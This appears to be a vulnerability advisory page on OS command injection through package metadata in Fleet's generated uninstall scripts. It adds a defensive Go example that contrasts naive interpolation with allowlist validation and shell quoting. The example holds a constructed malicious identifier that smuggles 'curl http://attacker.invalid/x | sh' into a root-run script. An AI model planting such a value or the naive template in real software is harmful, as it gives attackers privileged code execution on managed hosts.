GHSA-9vcr-g537-3w5v: Fleet vulnerable to OS command injection in software packages
Summary
Fleet does not properly sanitize the metadata it extracts from uploaded software packages (.pkg, .deb, .rpm, .exe and .msi files) before using it to generate uninstall scripts. A malicious package can therefore carry command-line or shell metacharacters in its metadata fields, and when the uninstall is triggered on a host those characters are interpreted as commands, giving the attacker arbitrary command execution with high privileges (root on macOS and Linux, SYSTEM on Windows).
Solution / Mitigation
The advisory lists two workarounds but no explicit fix or patch version: (1) only upload software packages from trusted, verified sources, and (2) manually inspect and edit the auto-generated uninstall scripts before deploying them. An immediate upgrade is referenced as an option, but no specific patched version number is provided in this text.
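The following Go snippet is an added illustration of the pattern described in the summary and of the second workaround above; it is not Fleet's code, and the real uninstall templates and metadata field names are not reproduced here. It assumes a hypothetical macOS template that runs `pkgutil --forget <identifier>`, a constructed malicious bundle identifier, and an allowlist regex chosen for the example. It contrasts verbatim interpolation of a metadata field with validation plus shell quoting, and adds an automated version of the "inspect the generated script before deploying it" check.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// uninstallTemplate is a hypothetical macOS uninstall template (assumption;
// not taken from Fleet). %s receives the package identifier read from the
// uploaded package's metadata.
const uninstallTemplate = "#!/bin/sh\npkgutil --forget %s\n"

// naiveUninstallScript interpolates the metadata field verbatim: whatever the
// package author put into the identifier lands unchanged in a script that
// later runs as root.
func naiveUninstallScript(pkgID string) string {
	return fmt.Sprintf(uninstallTemplate, pkgID)
}

// pkgIDPattern is an allowlist for reverse-DNS style identifiers. The exact
// set is an assumption for this example; the point is that it excludes every
// shell metacharacter and any newline.
var pkgIDPattern = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$`)

// shellQuote wraps s in single quotes for POSIX sh. Inside single quotes the
// only character that needs handling is the single quote itself.
func shellQuote(s string) string {
	return "'" + strings.ReplaceAll(s, "'", `'\''`) + "'"
}

// safeUninstallScript rejects identifiers outside the allowlist and quotes
// the survivor before interpolating it, so the template's command structure
// cannot be altered by package metadata.
func safeUninstallScript(pkgID string) (string, error) {
	if !pkgIDPattern.MatchString(pkgID) {
		return "", fmt.Errorf("package identifier %q rejected: characters outside the allowed set", pkgID)
	}
	return fmt.Sprintf(uninstallTemplate, shellQuote(pkgID)), nil
}

// metachars lists characters that never belong in a script built from this
// fixed template plus one quoted identifier.
var metachars = regexp.MustCompile("[;&|`$(){}<>\\\\]")

// scriptLooksTampered is a pre-deployment check over an auto-generated script
// (the manual inspection workaround, automated for this template): the script
// must be exactly the shebang plus one pkgutil line, and that line must carry
// no shell metacharacters.
func scriptLooksTampered(script string) bool {
	lines := strings.Split(strings.TrimSuffix(script, "\n"), "\n")
	if len(lines) != 2 || lines[0] != "#!/bin/sh" {
		return true
	}
	if !strings.HasPrefix(lines[1], "pkgutil --forget ") {
		return true
	}
	return metachars.MatchString(lines[1])
}

func main() {
	// Constructed malicious identifier for the example; not from any real package.
	malicious := "com.example.app; curl http://attacker.invalid/x | sh"

	fmt.Print("naive:\n", naiveUninstallScript(malicious))
	if _, err := safeUninstallScript(malicious); err != nil {
		fmt.Println("safe:", err)
	}
	good, _ := safeUninstallScript("com.example.app")
	fmt.Print("safe:\n", good)
	fmt.Println("tampered (naive, malicious):", scriptLooksTampered(naiveUninstallScript(malicious)))
	fmt.Println("tampered (safe, benign):    ", scriptLooksTampered(good))
}
```

The same reasoning applies to the Windows and Linux templates: msiexec or dpkg/rpm arguments built from package metadata need the equivalent allowlist and argument quoting for the interpreter that runs them, and a review of the generated script should compare it against the expected fixed shape rather than read it for suspicious-looking lines only.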
Vulnerability Details
EPSS: 0.0%
May 14, 2026
Classification
Affected Packages
Original source: https://github.com/advisories/GHSA-9vcr-g537-3w5v
First tracked: May 14, 2026 at 02:00 PM
Classified by LLM (prompt v3) · confidence: 95%